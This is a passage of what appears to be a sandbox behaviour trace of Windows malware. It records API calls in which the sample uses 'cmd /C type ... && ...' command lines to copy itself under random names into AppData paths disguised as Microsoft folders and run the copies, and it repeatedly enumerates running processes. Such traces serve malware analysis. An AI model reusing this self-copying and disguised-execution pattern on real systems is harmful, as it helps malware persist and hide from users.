\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb30*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 
dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb20 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x12fb20*(hProcess=0xc4, hThread=0xc0, dwProcessId=0xb34, dwThreadId=0xb38)) returned 1 [0094.530] CloseHandle (hObject=0xc4) returned 1 [0094.530] CloseHandle (hObject=0xc0) returned 1 [0094.530] Sleep (dwMilliseconds=0xfa) [0095.902] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 [0095.909] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.909] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.910] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.911] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.912] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.913] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.913] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.914] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.915] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.916] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0095.917] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.918] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.919] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.920] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.920] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.921] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.922] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.923] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.924] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.925] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.927] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0095.928] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0095.930] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.931] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.933] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.934] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0095.936] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0095.937] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0095.939] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0095.940] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0095.942] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0095.943] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0095.945] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0095.946] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0095.947] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0095.948] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.043] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.044] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.045] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.047] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.048] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.049] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0096.050] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.051] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.052] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.053] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: 
lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.055] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.056] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.058] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.059] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.060] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.061] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.062] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: 
lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.063] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.065] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.066] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.068] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.069] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.070] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.071] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: 
lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.072] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.073] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.075] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 0 [0096.075] CloseHandle (hObject=0xc8) returned 1 [0096.075] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0096.076] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0096.076] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0096.076] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\") returned 0x28 [0096.076] CharUpperBuffW (in: lpsz="type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0096.076] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0096.076] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" [PARAMS]", cchLength=0xb9 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\MICROS~1\\SYPYKBCK.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\MICROS~1\\SYPYKBCK.EXE\" [PARAMS]") returned 0xb9 [0096.076] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0096.076] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb30*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb20 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x12fb20*(hProcess=0xc4, hThread=0xc8, dwProcessId=0xb68, dwThreadId=0xb6c)) returned 1 [0096.246] CloseHandle (hObject=0xc4) returned 1 [0096.246] CloseHandle (hObject=0xc8) returned 1 [0096.246] Sleep (dwMilliseconds=0xfa) [0096.651] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xcc [0096.658] Process32FirstW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.659] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.659] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, 